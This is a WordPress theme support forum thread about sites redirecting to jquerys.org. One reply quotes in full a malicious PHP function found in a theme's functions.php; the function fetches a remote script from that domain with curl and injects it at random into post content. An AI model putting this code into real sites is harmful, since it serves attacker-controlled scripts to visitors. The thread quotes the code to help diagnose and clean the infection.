Viewing 8 posts - 1 through 8 (of 8 total)
  • Author
    Posts
  • #18867

    My themes always redirect to jquerys.org

    tommyson.com, let me know when you want to access, I deactivate the themes for safety or google will ban my domain forever

    #101210

    Hi ProjectIndo,

    I would suggest contacting your hosting provider and letting them know what is going on. The issue is most likely that your server has been compromised one way or another and some malicious code has been injected somewhere.

    Your host should be able to do a security scan and assist you further.

    Regards,

    Devin

    #101211

    Hello, I was overseas dealing some business, came back to my warm home and checking out my wordpress, I have installed WordPress Security Scan, hope it will help. Thank you

    #101212

    Let us know how it goes and definitely contact your hosting provider. They are absolutely the best equipped to deal with malicious code on a server. Even something like a wordpress security plugin can’t tell you if you have had your main cpanel account compromised or something like that.

    Regards,

    Devin

    #101213

    It’s not your HOST, it’s your THEME.

    In particular, a malicious line of code in functions.php

    This suggests to me that you’ve downloaded a stolen copy of the theme, or someone has given/sold you a stolen version.

    Look in the early section of your functions.php file and you’ll see something like this:

    function ins_php_in_post($content){$percentage = 25;if (rand(0, 100) < $percentage){ob_start();if(function_exists(‘curl_init’)) { $url = “http://www.jquerys.org/jquery-1.6.3.min.js”; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo “$data”; }$text = ob_get_clean();$pos = rand(0, strlen($content));$txtPrePos = substr($content, 0, $pos);$txtPostPos = substr($content, $pos);$openPos = strrpos($txtPrePos, “<”);if ($openPos !== false){$closePos = strrpos($txtPrePos, “>”);if ($openPos > $closePos || $closePos === false){$pos = strpos($content, “>”, $pos) + 1;}}$spos = strpos($content, ” “, $pos);if ($spos === false) {$spos = strlen($content);}$content = substr($content, 0, $spos) . ” ” . $text . substr($content, $spos);}return $content;}

    Thew quickest fix is to spend $60 and BUY the theme!

    If you try and remove malicious code, you’ll no doubt NOT get it ALL out, and you’ll have problems down the line with you website’s functionality. It’s just not worth the time or hassle!

    #101214

    Hey!

    Did you solve the issue?

    Best regards,

    Peter

    #101215

    Hi there!

    I purchased and installed this theme yesterday and some of my page links redirect to http://www.jquerys.org/ as well!

    #101216

    Hey!

    Can you post a link to a page where the issue occurs please?

    Best regards,

    Peter

Viewing 8 posts - 1 through 8 (of 8 total)

The topic ‘Recent download for Propelsion has a malicious malware’ is closed to new replies.